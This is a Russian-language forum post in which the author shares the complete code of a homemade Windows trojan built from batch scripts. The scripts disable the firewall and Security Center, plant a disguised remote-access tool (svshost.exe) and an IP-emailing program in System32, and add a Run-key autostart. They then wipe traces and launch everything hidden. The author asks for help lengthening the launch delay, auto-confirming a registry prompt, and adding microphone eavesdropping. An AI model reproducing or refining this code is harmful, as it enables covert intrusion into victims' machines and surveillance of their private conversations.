Здраствуйте, вот первый раз пытаюсь написать, вирус, но немогу 2 вещи в инете найти, вобщем есть 3 cmd фаила, первый "текстовый документ.cmd" второй "rr2.cmd" и третий"rr3.cmd " и ещё пару фаилов типа удалённый админ и утилита для cmd hidcon.exe - для устоновки в невидимом пользователю режиме. счас по порядку код опишу! Текстовый документ.cmd-код такой : @echo off chcp 866 sc config wscsvc start= disabled sc config SharedAccess start= disabled sc stop wscsvc sc stop SharedAccess copy "ip.exe" "%SYSTEMROOT%/System32/ip.exe" copy "svshost.exe" "%SYSTEMROOT%/System32/svshost.exe" copy "ultravnc.ini" "C:\WINDOWS\system32/ultravnc.ini" copy "hidcon.exe" "%SYSTEMROOT%/System32/hidcon.exe" copy "rr2.cmd" "%SYSTEMROOT%/System32/rr2.cmd" copy "rr3.cmd" "%SYSTEMROOT%/System32/rr3.cmd" REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MyProgr /t REG_SZ /d "%SYSTEMROOT%/System32/rr2.cmd del /f /q camsv.reg del /f /q camsvc.exe del /f /q instsrv.exe del /f /q ip.exe del /f /q srvany.exe del /f /q svсhost.exe del /f /q ultravnc.ini del /f /q vnchooks.dll del /f /q install.cmd счас поясню: sc config wscsvc start= disabled sc config SharedAccess start= disabled sc stop wscsvc sc stop SharedAccess обходит брадмеры и фаирволы copy "ip.exe" "%SYSTEMROOT%/System32/ip.exe" copy "svshost.exe" "%SYSTEMROOT%/System32/svshost.exe" copy "ultravnc.ini" "C:\WINDOWS\system32/ultravnc.ini" copy "hidcon.exe" "%SYSTEMROOT%/System32/hidcon.exe" copy "rr2.cmd" "%SYSTEMROOT%/System32/rr2.cmd" copy "rr3.cmd" "%SYSTEMROOT%/System32/rr3.cmd" копирует нужные мне фаилы и bat фаилы и втом числе утилиту для безпалевной установки REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MyProgr /t REG_SZ /d "%SYSTEMROOT%/System32/rr2.cmd Делает так чтоб "rr2.cmd" запускался при каждом пуске Остальной код удаляет все следы! В фаеле rr2 который запускаеться при пуске код: Start "" hidcon.exe rr3.cmd Это для безпалевной утилиты которая уже скопировалась в системную папку и она делает оба rr2 и rr3 файла когда они исполняються невидимыми для пользователя ну и фаил rr3 содержит код: @echo off :: Пример использования :: Некоторые действия echo Сейчас %time:~0,-3% :: пауза на 58 секунд call :sleep 58 Start "" hidcon.exe svshost.exe Start "" hidcon.exe ip.exe echo Сейчас %time:~0,-3% goto :EOF :sleep echo Пауза на %1 секунд... set /a ftime=%time:~6,-3%+%1 if %ftime% GEQ 125 set /a ftime-=125 :loop set ctime=%time:~6,-3% if /i %ftime% NEQ %ctime% goto :loop goto :EOF Это он сначала ждёт 58 секунд, а после запускает непосредственно саму прогу удаленного администратирования и прогу для отправки ip на мою почту, оба фаила уже находяться в системных папках их туда перекинула ещё первым cmd фаилом - текстовый документ Вот люди добрые, умные подскажите пожалуйста можно ли как то сменить код echo Сейчас %time:~0,-3% :: пауза на 58 секунд call :sleep 58 потомучто больше минуты ставить не получаеться не срабатывает, а надо когда пользователь уже точно в инете будет ну хотяб минут 10, или по пингу, И в текстовый документ.cmd косяк сначала копирует фаилы а после меня спрашивает: Value myprog exists, overwrite <Y/N>? и мне обязательно приходиться жать Y и ентер Это както можно автоматизировать, чтоб пользователя неспрашивала а само выберала Y ? И так ещё вопросик но он неглавный, хочу добавить прогу типа аудио захват- чтоб если микрофон подключен я мог слышать пользавателя, раньше с такими прогами не сталкивался , какую посоветуете? Могу выложить архив с этой вирусой)) Ну это есле виртуальная машина то безопасно(пофигу потомучто) , я только на вертуальной с ним работаю, потомучто потом постоянно такая фигня будет вылазеть в режиме конр альт делейт видно фаил nfv host какойто только от имени пользователя. Можно впринце наверно и не обязательно кодом, можт утилитами можно только я их незнаю, Всем кто ответит заранее большое спасибо!!! Всех с новым годом!!! И с рождеством!!!
